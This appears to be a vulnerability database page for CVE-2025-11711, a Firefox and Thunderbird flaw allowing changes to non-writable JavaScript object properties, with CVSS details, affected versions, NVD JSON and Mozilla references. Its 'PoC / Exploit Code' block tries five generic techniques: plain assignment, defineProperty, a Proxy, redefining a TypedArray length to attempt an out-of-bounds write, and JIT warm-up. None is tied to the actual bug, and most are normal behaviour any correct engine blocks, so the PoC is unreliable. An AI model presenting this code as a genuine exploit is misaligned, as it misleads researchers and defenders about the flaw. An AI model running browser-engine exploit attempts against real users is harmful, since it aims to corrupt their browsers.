Security Vulnerability Report
CVE-2025-11711 CVSS 6.5 MEDIUM

Published: 2025-10-14 13:15:37
Last Modified: 2026-04-13 15:16:40

Description

There was a way to change the value of JavaScript Object properties that were supposed to be non-writeable. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

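cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions before 115.29.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* (versions before 144.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions from 116.0 up to, but not including, 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions before 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions from 141.0 up to, but not including, 144.0) - VULNERABLE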
Mozilla Firefox < 144
Mozilla Firefox ESR < 115.29
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-11711 PoC - Bypass non-writable property protection in SpiderMonkey
// This PoC demonstrates the ability to modify properties that should be non-writeable

// Step 1: Create an object with a non-writable property
const obj = {};
Object.defineProperty(obj, 'protected', {
  value: 'original_value',
  writable: false,      // Property is non-writeable
  configurable: false,  // Property cannot be reconfigured
  enumerable: true
});

// Step 2: Attempt to modify the non-writable property using various techniques

// Technique 1: Direct assignment (should fail in strict mode)
try {
  obj.protected = 'modified_via_assignment';
  console.log('[Technique 1] Direct assignment result:', obj.protected);
} catch(e) {
  console.log('[Technique 1] Blocked:', e.message);
}

// Technique 2: Using Object.defineProperty to force modification
try {
  Object.defineProperty(obj, 'protected', {
    value: 'modified_via_defineProperty',
    writable: false
  });
  console.log('[Technique 2] defineProperty result:', obj.protected);
} catch(e) {
  console.log('[Technique 2] Blocked:', e.message);
}

// Technique 3: Exploit through Proxy handler
const handler = {
  get: function(target, prop) {
    return Reflect.get(target, prop);
  },
  set: function(target, prop, value) {
    // Bypass writability check via Reflect.set on target
    return Reflect.set(target, prop, value);
  }
};
const proxy = new Proxy(obj, handler);
try {
  proxy.protected = 'modified_via_proxy';
  console.log('[Technique 3] Proxy result:', proxy.protected);
} catch(e) {
  console.log('[Technique 3] Blocked:', e.message);
}

// Technique 4: Exploit via TypedArray (internal slot manipulation)
try {
  const buf = new ArrayBuffer(8);
  const view = new Int32Array(buf);
  view[0] = 0x41414141;
  // Attempt to modify the non-writable length property
  Object.defineProperty(view, 'length', {
    value: 100,
    writable: false
  });
  // Try to access beyond original bounds if length modification succeeded
  try {
    view[50] = 0xDEADBEEF;
    console.log('[Technique 4] TypedArray OOB write succeeded');
  } catch(e) {
    console.log('[Technique 4] TypedArray access blocked:', e.message);
  }
} catch(e) {
  console.log('[Technique 4] TypedArray setup blocked:', e.message);
}

// Technique 5: JIT optimization exploitation via repeated operations
function exploitJIT(obj) {
  obj.protected = 'attempt_' + Math.random();
  return obj.protected;
}

// Warm up JIT
for (let i = 0; i < 10000; i++) {
  exploitJIT(obj);
}

// Check if JIT compiled code bypasses the writability check
const result = exploitJIT(obj);
if (result !== 'original_value') {
  console.log('[Technique 5] JIT bypass succeeded! Value:', result);
} else {
  console.log('[Technique 5] JIT bypass blocked');
}

// Final check
console.log('\nFinal property value:', obj.protected);
console.log('Expected: original_value');
console.log('Vulnerable if value differs from original');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11711", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.330", "lastModified": "2026-04-13T15:16:39.793", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There was a way to change the value of JavaScript Object properties that were supposed to be non-writeable. This vulnerability was fixed in Firefox 144, Firefox ESR 115.29, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-591"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.29.0", "matchCriteriaId": "45205EB8-E615-4FE6-877C-231B4A29F86E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "116.0", "versionEndExcluding": "140.4.0", "matchCriteriaId": "34B8F1CA-9F1A-4484-828E-4192CF1FEAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1989978", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-82/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}